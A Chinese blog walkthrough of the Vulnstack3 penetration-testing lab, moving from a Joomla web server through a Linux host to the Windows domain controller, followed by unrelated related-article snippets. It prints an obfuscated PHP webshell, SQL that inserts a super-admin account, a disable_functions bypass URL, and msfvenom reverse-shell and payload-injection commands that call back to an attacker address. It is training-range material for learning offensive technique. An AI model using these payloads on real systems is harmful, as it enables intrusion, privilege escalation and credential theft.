【红日靶场】vulnstack3-完整渗透过程

news2024/12/24 3:58:17

系列文章目录

【红日靶场】vulnstack1-完整渗透过程
【红日靶场】vulnstack2-完整渗透过程
【红日靶场】vulnstack3-完整渗透过程


文章目录

  • 系列文章目录
  • 基本信息
  • 环境配置
  • 开始渗透
    • 信息收集
    • 暴力破解
    • 漏洞利用
    • 绕过
    • 内网信息收集
    • 尝试上线msf
    • 上线msf
    • 横向移动
    • msf 传达会话给cs
    • 横向到域控


基本信息

作者:licong

  • 环境配置:
    打开虚拟机镜像为挂起状态,第一时间进行快照,部分服务未做自启,重启后无法自动运行。
    挂起状态,账号已默认登陆,centos为出网机,第一次运行,需重新获取桥接模式网卡ip。
    除重新获取ip,不建议进行任何虚拟机操作。
    参考虚拟机网络配置,添加新的网络,该网络作为内部网络。
    注:名称及网段必须符合上述图片,进行了固定ip配置。

描述
目标:域控中存在一份重要文件。
本次环境为黑盒测试,不提供虚拟机账号密码。

环境配置

在这里插入图片描述
centos重启一下网卡:
在这里插入图片描述

开始渗透

信息收集

目标为10.50.128.107:其他目标不知道
在这里插入图片描述
在这里插入图片描述
看这里的图标应该是joomla:
在这里插入图片描述
存在:s2-007
在这里插入图片描述
利用失败,应该是误报
dirb爆破目录:
在这里插入图片描述
这个是后台:
在这里插入图片描述

尝试使用joomla的poc:失败了
在这里插入图片描述

指纹识别:
在这里插入图片描述

暴力破解

上面有个3306爆破一下数据库:
在这里插入图片描述

漏洞利用

没想到是数据库弱密码:
在这里插入图片描述
在这里插入图片描述

这里数据库没有权限:

在这里插入图片描述
用HeidiSQL连接:
在这里插入图片描述
直接用这个数据库做提权试试:
在这里插入图片描述
还是不行,直接获取joomla用户名密码上面我们找到他的后台了:
在这里插入图片描述
将密码保存下来:
在这里插入图片描述
用john解密:
在这里插入图片描述
破解一会:
在这里插入图片描述
等它慢慢跑,再去找找其他的信息:phpinfo界面
在这里插入图片描述
joomla版本信息:
在这里插入图片描述
这个配置下面有个密码像是mysql的配置:
先测试一下登录后台
在这里插入图片描述
登录后台试试:
在这里插入图片描述
不是后台的密码:尝试了admin,testuser
在这里插入图片描述
尝试前台登录:
在这里插入图片描述
在这里插入图片描述

连接成功:
在这里插入图片描述

直接添加一个用户:

USE joomla;

INSERT INTO `am2zu_users`(`name`, `username`, `password`, `params`, `registerDate`, `lastvisitDate`, `lastResetTime`)
VALUES ('julien', 'julien','d2064d358136996bd22421584a7cb33e:trd7TvKHx6dMeoMmBVxYmg0vuXEA4199', '', NOW(), NOW(), NOW());

INSERT INTO `am2zu_user_usergroup_map` (`user_id`, `group_id`)
VALUES (LAST_INSERT_ID(), '8');

这里直接给的密码加密过的方式
在这里插入图片描述
还能直接修改为:secret
在这里插入图片描述
我尝试插入数据但是加密过的数据不考虑joomla的加密方式直接修改数据库也是可以的:
在这里插入图片描述
还能尝试爆破使用john工具爆破,但这里用的应该是随机密码爆不出来:
直接登录后台:
在这里插入图片描述
写入shell:
在这里插入图片描述
在这里插入图片描述
写个蚁剑的免杀马:
在这里插入图片描述
保存
在这里插入图片描述
路径:
在这里插入图片描述
感觉像是免杀马问题没连上
在这里插入图片描述
突然想到上面的php版本是7而且禁用了很多危险函数:
在这里插入图片描述
用蚁剑的shell生成:

<?php $mXPo=create_function(base64_decode('JA==').str_rot13('f').str_rot13('b').str_rot13('z').chr(0x32e-0x2c9),base64_decode('ZQ==').chr(558-440).chr(0x17b-0x11a).chr(59940/555).base64_decode('KA==').chr(0x2a7-0x283).str_rot13('f').base64_decode('bw==').base64_decode('bQ==').base64_decode('ZQ==').str_rot13(')').chr(50622/858));$mXPo(base64_decode('OTEzO'.'DQ2O0'.'BldkF'.'sKCRf'.''.chr(474-389).chr(642-573).chr(026463/0313).str_rot13('G').chr(429-343).''.''.base64_decode('Rg==').chr(285-170).base64_decode('Mg==').base64_decode('Tg==').chr(01250-01076).''.'ZdKTs'.'yNzQx'.'NTM4O'.'w=='.''));?>

在这里插入图片描述
在这里插入图片描述
成功连接:
在这里插入图片描述

绕过

这里是因为函数禁用的原因:返回ret=127
绕过:https://github.com/yangyangwithgnu/bypass_disablefunc_via_LD_PRELOAD
在这里插入图片描述

http://10.50.128.107/templates/beez3/bypass_disablefunc.php?cmd=pwd&outpath=/tmp/xx&sopath=/tmp/bypass_disablefunc_x64.so

成功绕过:
在这里插入图片描述

内网信息收集

查看一下网卡:发现不对劲为内网段
在这里插入图片描述

尝试上线msf

在这里插入图片描述
上传:
在这里插入图片描述
加权限后运行:(失败了)
在这里插入图片描述
这里有个mysql文件夹:
这里添加了一个用户
在这里插入图片描述
这台主机的22端口是开放的尝试登录:
登录成功了
在这里插入图片描述
权限不够:
在这里插入图片描述
尝试上线msf(失败了,这里就不放了)
直接提权:
这里Linux kernel>2.6.22可以直接用脏牛
在这里插入图片描述
脏牛:https://github.com/Rvn0xsy/linux_dirty
在这里插入图片描述
提权到root了
在这里插入图片描述
查看一下网卡:
在这里插入图片描述
那上面那台主机使用的NGINX反向代理代理到这个网口的,所以刚刚的webshell是另外一台的主机:
现在做内网穿透将这台主机代理出来:我测试我这有问题(我的环境有安全设备拦截了msf的流量)

我这直接用内网网卡做:msf

msfvenom -p linux/x64/meterpreter_reverse_tcp LHOST=192.168.93.128 LPORT=8888 -f elf > mshell.elf

msfconsole
use exploit/multi/handler
set payload linux/x64/meterpreter/reverse_tcp
set lhost 192.168.93.128
set lport 8888
run

在这里插入图片描述

在这里插入图片描述

内网探测:
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
这台应该是NGINX反向代理那台:
在这里插入图片描述
fscna探测一下:
在这里插入图片描述

上线msf

上面没成功这里有root权限直接上传马上线:
在这里插入图片描述
在这里插入图片描述

在这里插入图片描述

横向移动

存在10和20还有30主机现在已经拿到了100和120主机的权限了,在拿下其他的主机:
先整理一下信息:
192.168.93.30 MSBROWSE\WIN7 Windows 7 Professional 7601 Service Pack 1
192.168.93.20 TEST\WIN2008 Windows Server ® 2008 Datacenter 6003 Service Pack 2
192.168.93.10 DC TEST\WIN-8GA56TNV3MV Windows Server 2012 R2 Datacenter 9600

域控制器应该是10地址上,其他win7可能是用户20可能是服务器:
端口方面:
192.168.93.10 :主要关注135和445还有88端口389
192.168.93.20:主要关注80、445、1443和2383
192.168.93.30 :主要关注135、139、443
尝试访问80端口:
在这里插入图片描述
这里可能存在CVE-2020-0618

在这里插入图片描述
我的内网可以直接访问:(大家需要做socke)
直接爆破一下smb:在这里插入图片描述
kali使用smb登录:

在这里插入图片描述
在域内:
在这里插入图片描述
域控为10主机:其实fscan哪里也可以看到
在这里插入图片描述
看一下端口:
在这里插入图片描述
创建监听器:
在这里插入图片描述
在这里插入图片描述

msf 传达会话给cs

msf6 exploit(windows/local/payload_inject) > set payload windows/meterpreter/reverse_http
payload => windows/meterpreter/reverse_http
msf6 exploit(windows/local/payload_inject) > set prependmigrate true
prependmigrate => true
msf6 exploit(windows/local/payload_inject) > set lhost 192.168.93.128
lhost => 192.168.93.128
msf6 exploit(windows/local/payload_inject) > set lport 4422
lport => 4422
msf6 exploit(windows/local/payload_inject) > set session 2
session => 2
msf6 exploit(windows/local/payload_inject) > run

没成功多运行几次
在这里插入图片描述

在这里插入图片描述
抓取密码:
在这里插入图片描述
再次横向移动:
在这里插入图片描述
在这里插入图片描述

横向到域控

成功拿到域控
在这里插入图片描述
再次横向到30主机:(失败)443gg了,应该是授权的问题,这个win7太久没用了激活掉了
443也爆破不了
在这里插入图片描述
还有其他方式可以横向这个看自己爱好,这次先到这,拿到后可以权限维持,这里不在赘述。

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/1066760.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

关于IDEA中gradle项目bootrun无法进入断点以及gradle配置页面不全的解决方案

问题背景 在使用gradle编写的bootrun&#xff0c;采用debug方式启动项目时&#xff0c;无法进入断点&#xff0c;程序正常运行 并发现象1 此处无法识别为大象图标 点击右键后&#xff0c;没有圈中的这个选项 并发现象2 图片圈中的位置缺失 问题原因 正常的 run 命令是通过…

【状态估计】将Transformer和LSTM与EM算法结合到卡尔曼滤波器中,用于状态估计(Python代码实现)

&#x1f4a5;&#x1f4a5;&#x1f49e;&#x1f49e;欢迎来到本博客❤️❤️&#x1f4a5;&#x1f4a5; &#x1f3c6;博主优势&#xff1a;&#x1f31e;&#x1f31e;&#x1f31e;博客内容尽量做到思维缜密&#xff0c;逻辑清晰&#xff0c;为了方便读者。 ⛳️座右铭&a…

蓝牙技术|Matter或能改变中国智能家居市场,蓝牙技术将得到进一步应用

近年来&#xff0c;智能家居开放协议标准Matter&#xff08;目前版本 1.1&#xff09;由连接标准联盟发布&#xff0c;该联盟是一个由数百家公司组成的全球性机构&#xff0c;旨在提供与物联网 (IoT) 相关的标准。例如&#xff0c;Matter 用于允许 Amazon Alexa、Apple Home、G…

【java源码】二甲医院his系统全套源码 云HIS系统源码

基层医院云HIS系统源码 一款满足基层医院各类业务需要的云HIS系统。该系统能帮助基层医院完成日常各类业务&#xff0c;提供病患挂号支持、病患问诊、电子病历、开药发药、会员管理、统计查询、医生站和护士站等一系列常规功能&#xff0c;还能与公卫、PACS等各类外部系统融合&…

样式组件-样式失效问题

问题&#xff1a; 正常步骤&#xff08; npm install 安装样式组件引入到代码中使用less文件中&#xff0c;引入样式文件 import ‘~dtd/lib/style/themes/default.less’; &#xff09; 步骤之后&#xff0c;样式与网页展示不一致&#xff0c;样式没有正常显示 解决&#x…

第八课 二分

文章目录 第八课 二分lc704.二分查找--简单题目描述代码展示 二分模版lc34.排序数组中查找元素的第一个和最后一个位置--中等题目描述代码展示 lc69.x的平方根--简单题目描述代码展示 lc74.搜索二维矩阵--中等题目描述代码展示 lc153.寻找旋转排序数组中的最小值--中等题目描述…

剑指offer——JZ33 二叉搜索树的后序遍历序列 解题思路与具体代码【C++】

一、题目描述与要求 二叉搜索树的后序遍历序列_牛客题霸_牛客网 (nowcoder.com) 题目描述 输入一个整数数组&#xff0c;判断该数组是不是某二叉搜索树的后序遍历的结果。如果是则返回 true ,否则返回 false 。假设输入的数组的任意两个数字都互不相同。 数据范围&#xff…

12P2532X162-233A KJ3222X1-BA1 CE4003S2B3 EMERSON CONTROLLER

12P2532X162-233A KJ3222X1-BA1 CE4003S2B3 EMERSON CONTROLLER EDGEBoost I/O模块是一种可扩展的模块化解决方案&#xff0c;集成到Premio的工业计算机中&#xff0c;通过即插即用的可扩展性提供增强的可靠性。这些附加模块有助于解决在加固边缘出现的设计限制和兼容性问题。…

VUE3技术报告

文章目录 node和webstorm基本概念1. Node.js2. npm3.Webpack4. Vue webstorm创建vue项目1. 通过npx create-vue创建vue项目2. 通过npx --package vue/cli vue创建vue项目 VUE3起步-创建应用-挂载应用1. createApp 创建函数&mount挂载应用2. 创建应用中的data选项3. methods…

Django实战项目-学习任务系统-用户登录

第一步&#xff1a;先创建一个Django应用程序框架代码 1&#xff0c;先创建一个Django项目 django-admin startproject mysite将创建一个目录&#xff0c;其布局如下&#xff1a;mysite/manage.pymysite/__init__.pysettings.pyurls.pyasgi.pywsgi.py 2&#xff0c;再创建一个…

实时监视分析 IIS 日志

Microsoft IIS服务器&#xff0c;无论是Web还是FTP&#xff0c;对于企业来说都是必不可少的。但是&#xff0c;IT 安全管理员的工作并不止于部署 IIS 服务器&#xff0c;部署后&#xff0c;管理员必须采取安全措施来保护这些服务器&#xff0c;监视 IIS 服务器安全性的一种行之…

免杀对抗-反沙盒+反调试

反VT-沙盒检测-Go&Python 介绍&#xff1a; 近年来&#xff0c;各类恶意软件层出不穷&#xff0c;反病毒软件也更新了各种检测方案以提高检率。 其中比较有效的方案是动态沙箱检测技术&#xff0c;即通过在沙箱中运行程序并观察程序行为来判断程序是否为恶意程序。简单来说…

ubuntu 设置x11vnc服务

Ubuntu 18.04 设置x11vnc服务 自带的vino-server也可以用但是不好用&#xff0c;在ubuntu论坛上看见推荐的x11vnc&#xff08;ubuntu关于vnc的帮助页面&#xff09;&#xff0c;使用设置一下&#xff0c;结果发现有一些坑需要填&#xff0c;所以写下来方便下次使用 转载请说明…

<el-input> textarea文本域显示滚动条(超过高度就自动显示)+ <el-input >不能正常输入,输入了也不能删除的问题

需求&#xff1a;首先是给定高度&#xff0c;输入文本框要自适应这个高度。文本超出高度就会显示滚动条否则不显示。 <el-row class"textarea-row"><el-col :span"3" class"first-row-title">天气</el-col><el-col :span&…

外卖小程序源码vs定制开发:何时选择哪种方式?

在数字餐饮行业的蓬勃发展中&#xff0c;外卖应用程序已经成为餐厅和创业者的必备工具。然而&#xff0c;当涉及到开发外卖应用程序时&#xff0c;您会面临一个重要的决策&#xff1a;是使用外卖小程序源码还是进行定制开发&#xff1f;这两种方法各有优势和劣势&#xff0c;取…

这款可视化拖拽式低代码平台,真香!

目录 一、产品介绍 二、设计原理 三、界面展示 1、代码生成器 2、工作流程 3、门户设计 4、大屏设计 5、报表设计 6、第三方登录 7、多租户实现 8、分布式调度 9、消息中心 四、功能框架 我们在低代码领域探索了很多年&#xff0c;从2014 开始研发低代码前端渲染&#xff0c;从…

DRM全解析 —— CRTC详解(1)

本文参考以下博文&#xff1a; Linux内核4.14版本——drm框架分析(4)——crtc分析 特此致谢&#xff01; 1. 简介 CRTC实际上可以拆分为CRTC。CRT的中文意思是阴极摄像管&#xff0c;就是当初老电视上普遍使用的显像管&#xff08;老电视之所以都很厚&#xff0c;就是因为它…

初学者如何选择:前端开发还是后端开发?

#开发做前端好还是后端好【话题征文】# 作为一名有多年开发经验的过来人&#xff0c;我认为前端开发和后端开发都有其独特的魅力和挑战。下面我将就我的个人经历和观点来分享一些关于前端开发和后端开发的看法。 首先&#xff0c;让我们将编程世界的大城市比作前端开发和后端开…

微信小程序获取用户头像调整

微信小程序获取用户头像&#xff0c;由于用户隐私策略调整&#xff0c;腾讯对获取用户信息也进行了调整。 记录内容如下&#xff1a; 1 新方式 新的方式&#xff1a;当触发获取用户头像时&#xff0c;由用户选择头像图片&#xff0c;输入昵称。 具体代码如下&#xff0c;即&…

Mybatis-plus 使用

1. 注解使用 mybatis-plus提供了 TableName, TableId, TableField, TableLogic 四种注解&#xff0c;其含义分别为&#xff1a; TableName TableName("SPF_Require_Vehicle") 用于声明当前class所对应数据库中的表&#xff0c;如果class的名字和表的名字完全相同&…